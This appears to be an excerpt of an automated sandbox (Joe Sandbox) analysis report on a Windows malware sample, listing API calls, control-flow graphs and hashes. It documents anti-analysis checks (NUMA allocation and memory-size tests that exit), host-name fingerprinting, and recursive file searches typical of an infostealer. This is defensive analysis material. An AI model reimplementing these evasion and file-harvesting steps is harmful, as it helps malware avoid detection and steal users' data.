                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: f8510881fc84f41369415c2027d9d9d87837f4a901ff845e15be841d1621a1dc
                          • Instruction ID: 94826ee63db62e9e204e0a814b72d98dcc4d0e980ba1a1a44e7a871212e8a739
                          • Opcode Fuzzy Hash: f8510881fc84f41369415c2027d9d9d87837f4a901ff845e15be841d1621a1dc
                          • Instruction Fuzzy Hash: BF012D71D00218ABDB10DFA8EC45B9EBBB8EB58320F008126F955E7390DB7459058FD4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 7d1030-7d1055 GetCurrentProcess VirtualAllocExNuma 2799 7d105e-7d107b VirtualAlloc 2798->2799 2800 7d1057-7d1058 ExitProcess 2798->2800 2801 7d107d-7d1080 2799->2801 2802 7d1082-7d1088 2799->2802 2801->2802 2803 7d108a-7d10ab VirtualFree 2802->2803 2804 7d10b1-7d10b6 2802->2804 2803->2804
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                          • ExitProcess.KERNEL32 ref: 007D1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007D106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007D10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 0e67b9f99da2135139ded0cf45e55beebd0943bad9509a5ee898db71a24fdd7d
                          • Instruction ID: 1e0872dd7c188531e4ab68dd0e7fe2d53eda54e128d94dcf8ac899b596a66d19
                          • Opcode Fuzzy Hash: 0e67b9f99da2135139ded0cf45e55beebd0943bad9509a5ee898db71a24fdd7d
                          • Instruction Fuzzy Hash: D001F4717802087BF7209AB56C1AF6B7BADE784B01F208015F748E73C0DAB5E9028664

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 7eee90-7eeeb5 call 7d2930 2808 7eeec9-7eeecd call 7d6c40 2805->2808 2809 7eeeb7-7eeebf 2805->2809 2812 7eeed2-7eeee8 StrCmpCA 2808->2812 2809->2808 2810 7eeec1-7eeec3 lstrcpy 2809->2810 2810->2808 2813 7eeeea-7eef02 call 7d2a20 call 7d2930 2812->2813 2814 7eef11-7eef18 call 7d2a20 2812->2814 2823 7eef04-7eef0c 2813->2823 2824 7eef45-7eefa0 call 7d2a20 * 10 2813->2824 2819 7eef20-7eef28 2814->2819 2819->2819 2821 7eef2a-7eef37 call 7d2930 2819->2821 2821->2824 2830 7eef39 2821->2830 2823->2824 2826 7eef0e-7eef0f 2823->2826 2829 7eef3e-7eef3f lstrcpy 2826->2829 2829->2824 2830->2829
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EEEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EEF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 9d5698f6e2c905b742af9eaba3c0c3d1031819af6e33c9cb3677875771a4193f
                          • Instruction ID: e0b32a03d15f1243462570d0fbfed52d89b1a6b10ce5f0caecb3bf31ef6f039e
                          • Opcode Fuzzy Hash: 9d5698f6e2c905b742af9eaba3c0c3d1031819af6e33c9cb3677875771a4193f
                          • Instruction Fuzzy Hash: 4B21F170621255DBCB61FF79DC49B9A37B4EF64300F04A425B84AEB353DA38E8078790

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 7d10c0-7d10cb 2887 7d10d0-7d10dc 2886->2887 2889 7d10de-7d10f3 GlobalMemoryStatusEx 2887->2889 2890 7d10f5-7d1106 2889->2890 2891 7d1112-7d1114 ExitProcess 2889->2891 2892 7d1108 2890->2892 2893 7d111a-7d111d 2890->2893 2892->2891 2894 7d110a-7d1110 2892->2894 2894->2891 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 3acbde0234d23288ed80c06c9dccbede04ce403d699eda702e3fa32979cd1958
                          • Instruction ID: 38135a6e2149afcca30a0b0aed90eefa5d459995fa1a304d6f97d78058966345
                          • Opcode Fuzzy Hash: 3acbde0234d23288ed80c06c9dccbede04ce403d699eda702e3fa32979cd1958
                          • Instruction Fuzzy Hash: 73F0AE7011424D67E714BAA4D84571EF7F8E701350F94452BDED6C2392F679C8819177

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 7e8c88-7e8cc4 StrCmpCA 2898 7e8ccd-7e8ce6 2895->2898 2899 7e8cc6-7e8cc7 ExitProcess 2895->2899 2901 7e8cec-7e8cf1 2898->2901 2902 7e8ee2-7e8eef call 7d2a20 2898->2902 2904 7e8cf6-7e8cf9 2901->2904 2906 7e8cff 2904->2906 2907 7e8ec3-7e8edc 2904->2907 2908 7e8dbd-7e8dcb StrCmpCA 2906->2908 2909 7e8ddd-7e8deb StrCmpCA 2906->2909 2910 7e8dfd-7e8e0b StrCmpCA 2906->2910 2911 7e8e1d-7e8e2b StrCmpCA 2906->2911 2912 7e8e3d-7e8e4b StrCmpCA 2906->2912 2913 7e8d5a-7e8d69 lstrlen 2906->2913 2914 7e8e56-7e8e64 StrCmpCA 2906->2914 2915 7e8d30-7e8d3f lstrlen 2906->2915 2916 7e8e6f-7e8e7d StrCmpCA 2906->2916 2917 7e8e88-7e8e9a lstrlen 2906->2917 2918 7e8d06-7e8d15 lstrlen 2906->2918 2919 7e8d84-7e8d92 StrCmpCA 2906->2919 2920 7e8da4-7e8db8 StrCmpCA 2906->2920 2907->2902 2939 7e8cf3 2907->2939 2908->2907 2922 7e8dd1-7e8dd8 2908->2922 2909->2907 2923 7e8df1-7e8df8 2909->2923 2910->2907 2924 7e8e11-7e8e18 2910->2924 2911->2907 2925 7e8e31-7e8e38 2911->2925 2912->2907 2926 7e8e4d-7e8e54 2912->2926 2935 7e8d6b-7e8d70 call 7d2a20 2913->2935 2936 7e8d73-7e8d7f call 7d2930 2913->2936 2914->2907 2929 7e8e66-7e8e6d 2914->2929 2933 7e8d49-7e8d55 call 7d2930 2915->2933 2934 7e8d41-7e8d46 call 7d2a20 2915->2934 2916->2907 2930 7e8e7f-7e8e86 2916->2930 2931 7e8e9c-7e8ea1 call 7d2a20 2917->2931 2932 7e8ea4-7e8eb0 call 7d2930 2917->2932 2927 7e8d1f-7e8d2b call 7d2930 2918->2927 2928 7e8d17-7e8d1c call 7d2a20 2918->2928 2919->2907 2921 7e8d98-7e8d9f 2919->2921 2920->2907 2921->2907 2922->2907 2923->2907 2924->2907 2925->2907 2926->2907 2955 7e8eb3-7e8eb5 2927->2955 2928->2927 2929->2907 2930->2907 2931->2932 2932->2955 2933->2955 2934->2933 2935->2936 2936->2955 2939->2904 2955->2907 2956 7e8eb7-7e8eb9 2955->2956 2956->2907 2957 7e8ebb-7e8ebd lstrcpy 2956->2957 2957->2907
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 5f8494d08b80541fd7e1a56f5ab317427c7ae67e5ebc8222147eddd60968100d
                          • Instruction ID: 05d057669d0ab0ba6eaeafaeb48f1d8f911326e5e461f55bf290798023799aeb
                          • Opcode Fuzzy Hash: 5f8494d08b80541fd7e1a56f5ab317427c7ae67e5ebc8222147eddd60968100d
                          • Instruction Fuzzy Hash: 3AE0D8A0100745E7D7209BB5CC44947BFA8FF84710B04842CA58997651DB78FC02C3A5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 7f2ad0-7f2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 7f2b44-7f2b59 2958->2959 2960 7f2b24-7f2b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 007F2B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 89eee69b8e2ca78f30f493e1e5e56c3736d7adea988500745b2df6c492a8d47e
                          • Instruction ID: dc506dbbfbc83271008942f4c67ea5e7dd5e091343b69f36b8e2fbeae59dfbea
                          • Opcode Fuzzy Hash: 89eee69b8e2ca78f30f493e1e5e56c3736d7adea988500745b2df6c492a8d47e
                          • Instruction Fuzzy Hash: 8401D6B2A44208ABD710DF99EC45BAEF7B8F744B21F00026AFA19D3780D774190587A1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                          • ExitProcess.KERNEL32 ref: 007D1058
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 636db52f160a7b29f339581df1591ce84a33112f09772c7fa200ec93e7d1d333
                          • Instruction ID: b19d16fffd82f73485cf6f52fc598d535731710d8fdde70cca24b58676be4fae
                          • Opcode Fuzzy Hash: 636db52f160a7b29f339581df1591ce84a33112f09772c7fa200ec93e7d1d333
                          • Instruction Fuzzy Hash: F6E012B17C43887AFA3167A15C0EF173A3C9751B11F545002B745EA1D3E6ADA8425574
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2402
                          • lstrlen.KERNEL32(\*.*), ref: 007E240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: f52782bb23d5b74586949ceb60d613d47fc2f8c15e93e56dc842b3636cad32fe
                          • Instruction ID: 8fe78afa71782c8431728702e5d134f5ec5730b3d1fc1d9e2f792b911737de22
                          • Opcode Fuzzy Hash: f52782bb23d5b74586949ceb60d613d47fc2f8c15e93e56dc842b3636cad32fe
                          • Instruction Fuzzy Hash: F5A27F71A0225A9BDB21EFB5DC4DAAF77B9AF58300F048129B845E7252DB3CDD038B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D16E2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D176C
                          • lstrcat.KERNEL32(00000000), ref: 007D1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D17F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1875
                          • lstrcat.KERNEL32(00000000), ref: 007D187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D18FE
                          • lstrlen.KERNEL32(00801794), ref: 007D1909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1929
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1966
                          • lstrlen.KERNEL32(\*.*), ref: 007D1971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007D199A
                            • Part of subcall function 007F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 007F406D
                            • Part of subcall function 007F4040: lstrcpy.KERNEL32(00000000,?), ref: 007F40A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A16
                          • lstrlen.KERNEL32(00801794), ref: 007D1A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A41
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A81
                          • lstrlen.KERNEL32(00801794), ref: 007D1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1AAC
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007D1B45
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007D1B70
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007D1B8A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1C03
                          • lstrlen.KERNEL32(00801794), ref: 007D1C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1C31
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1C74
                          • lstrlen.KERNEL32(00801794), ref: 007D1C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1CA2
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1CAE
                          • lstrlen.KERNEL32(?), ref: 007D1CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1CE9
                          • lstrlen.KERNEL32(00801794), ref: 007D1CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1D14
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D46
